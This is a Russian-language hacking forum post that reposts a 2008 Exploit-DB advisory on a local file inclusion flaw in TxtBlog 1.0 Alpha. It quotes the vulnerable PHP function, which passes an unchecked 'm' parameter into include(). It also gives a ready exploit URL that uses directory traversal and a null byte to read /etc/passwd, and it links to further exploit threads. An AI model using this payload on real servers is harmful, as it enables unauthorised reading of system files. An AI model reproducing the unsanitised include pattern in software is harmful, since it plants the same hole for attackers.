Exploit TxtBlog 1.0 Alpha - Local File Inclusion

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7241
Проверка EDB
  1. Пройдено
Автор
CWH UNDERGROUND
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-5639
Дата публикации
2008-11-27
Код: 
============================================================
  TxtBlog (index.php m) Local File Inclusion Vulnerability
============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 27 November 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : TxtBlog
 VERSION     : v.1.0 Alpha
 DOWNLOAD    : http://downloads.sourceforge.net/txtblogcms/txtblogcms-1.0a.zip
#####################################################

--- Local File Inclusion ---

-----------------------------
 Vulnerable File (index.php)
-----------------------------

function showMonth() {
	global $config_date_format, $txtblog_body, $txtblog_title, $config_title;

	$txtblog_body = "";
	$txtblog_title = "$config_title - Archives";

	$year = $_GET['y'];			
	$month = $_GET['m'];				

	$files = findFiles("data/$year/$month");	<<< BUG !!!!
	
	if (isset($files)) {
	foreach ($files as $file) {
				
		include ("data/$year/$month/$file");	<<< BUG !!!!
		$date_array = explode(" ",$date);
		$date = date($config_date_format, mktime($date_array[0], $date_array[1], $date_array[2], $date_array[3], $date_array[4], $date_array[5]));
		$txtblog_body .= "<span class='blog_title'>$title</span><br>\n<span class='blog_date'>$date</span><br>\n".bb2html($blog)."<br>\n<hr size='1'>\n";

	}
	}
}

---------
 Exploit
---------

[+] http://[Target]/[txtblogcms_path]/index.php?y=2005&m=01/../../../../../../../../etc/passwd%00


#######################################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################

# milw0rm.com [2008-11-27]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit TxtBlog 1.0 Alpha - Remote Command Execution
Ответы
0
Просмотры
246
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 - 'Username' Denial of Service (PoC)
Ответы
0
Просмотры
602
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit NeoBill 0.9-alpha - 'language' Local File Inclusion
Ответы
0
Просмотры
503
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit ALPHA Player 2.4 - '.bmp' Buffer Overflow
Ответы
0
Просмотры
481
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Ethereal 0.8.4/0.8.5/0.8.6 / tcpdump 3.4/3.5 alpha - DNS Decode (2)
Ответы
0
Просмотры
467
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Ethereal 0.8.4/0.8.5/0.8.6 / tcpdump 3.4/3.5 alpha - DNS Decode (1)
Ответы
0
Просмотры
459
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit TomatoCart 1.2.0 Alpha 2 - 'json.php' Local File Inclusion
Ответы
0
Просмотры
456
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit NuclearBB Alpha 1 - Multiple SQL Injections
Ответы
0
Просмотры
453
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities
Ответы
0
Просмотры
471
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting
Ответы
0
Просмотры
445
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу